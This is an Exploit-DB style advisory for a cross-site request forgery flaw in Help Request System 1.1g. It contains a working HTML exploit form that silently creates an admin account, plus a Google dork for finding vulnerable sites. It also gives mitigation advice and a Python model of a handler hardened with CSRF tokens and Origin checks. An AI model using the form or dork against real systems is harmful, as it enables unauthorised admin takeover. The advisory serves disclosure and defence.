Vendor: Help Request System
Author: G13
CVSS: 7.5 (HIGH)
CWE: 352 (Cross-Site Request Forgery (XSRF))
Product Name: Help Request System
Affected Version From: 1.1g
Affected Version To: 1.1g
Patch Exists: NO
Related CWE: N/A
CPE: freehelpdesk.org
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2011

Help Request System 1.1g XSRF (add admin)

This exploit allows an attacker to add an admin user to Help Request System 1.1g by getting a logged-in administrator to submit a form hosted on an attacker-controlled page. The form POSTs to index.php?sub=users&action=store&type=add with the same fields as the application's own "add user" form (name, login name, password and password confirmation) plus a hidden user_level field. Because the store action accepts the request without any anti-CSRF protection and takes the privilege level from the submitted user_level value, setting user_level to 0 creates an admin user under the victim's session.

Mitigation:

The application should bind the "add user" form to the administrator's session with an unpredictable anti-CSRF token that is verified server-side on the store action, and it should decide whether the requesting session is authorized to create users (and at what level) from server-side state rather than trusting the submitted user_level field. All other user input should be validated as well.
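The following is an added example, not code from Help Request System or from the original advisory. It models the users/store/add handler in Python with the synchronizer-token pattern plus an Origin check and session-based authorization; the form field names come from the exploit above, while the session keys, the value 1 as a non-admin level and the attacker origin are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlparse

APP_ORIGIN = "http://localhost"   # scheme+host of the vulnerable form action


def issue_csrf_token(session):
    """Mint a per-session token; the real form embeds it as a hidden field."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def request_origin(headers):
    """Normalise Origin (or Referer as a fallback) to scheme://host[:port]."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return None
    p = urlparse(src)
    return f"{p.scheme}://{p.netloc}"


def store_user(session, headers, form):
    """Hardened model of POST index.php?sub=users&action=store&type=add."""
    # Authorization comes from the session (level 0 = admin per the advisory),
    # never from the posted user_level field.
    if session.get("user_level") != 0:
        return 403, "admin session required"
    # A forged form lives on another origin; reject it before anything else.
    if request_origin(headers) != APP_ORIGIN:
        return 403, "cross-origin request rejected"
    # Synchronizer token: must equal the session copy, compared in constant time.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    if not form.get("user_login") or form.get("user_password") != form.get("user_password_confirm"):
        return 400, "bad user data"
    level = form.get("user_level", "1")          # "1" = non-admin (assumed)
    if level not in ("0", "1"):
        return 400, "bad user_level"
    return 200, {"user_login": form["user_login"], "user_level": int(level)}


def forged_request(admin_session):
    """The exploit's form as a browser would send it: foreign Origin, no token."""
    headers = {"Origin": "http://attacker.example"}          # constructed
    form = {"user_name": "x", "user_login": "x", "user_password": "p",
            "user_password_confirm": "p", "user_level": "0"}
    return store_user(admin_session, headers, form)
```

A legitimate submission from the application's own page carries `Origin: http://localhost` and the token issued by `issue_csrf_token` for that session, and is the only combination that reaches the user-creation branch.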
Source: Exploit-DB raw data

# Exploit Title: Help Request System 1.1g XSRF (add admin)
# Date: 08-23-2011
# Google Dork: "powered by freehelpdesk.org"
# Author: G13
# Software link: http://freehelpdesk.org/
# Version: 1.1g

<html>
<body>
<!-- Mirrors the application's own "add user" form; submitting it from a
     logged-in administrator's browser creates the user under that session. -->
<form id="edit" method="post"
      action="http://localhost/request/index.php?sub=users&action=store&type=add"
      enctype="">
Name: <input class="FormItemTextbox" type="text" name="user_name" size="35" maxlength="" value=""><br>
Login name: <input class="FormItemTextbox" type="text" name="user_login" size="20" maxlength="" value=""><br>
Pass: <input class="FormItemTextbox" type="password" id="user_password" name="user_password" size="20" value=""><br>
Pass confirm: <input class="FormItemTextbox" type="password" id="user_password_confirm" name="user_password_confirm" size="20" value=""><br>
<!-- user_level 0 is the admin level; the server trusts this field -->
<input type="hidden" name="user_level" value="0">
<input class="btn" type="submit" value="Submit" id="submit" name="submit">
</form>
</body>
</html>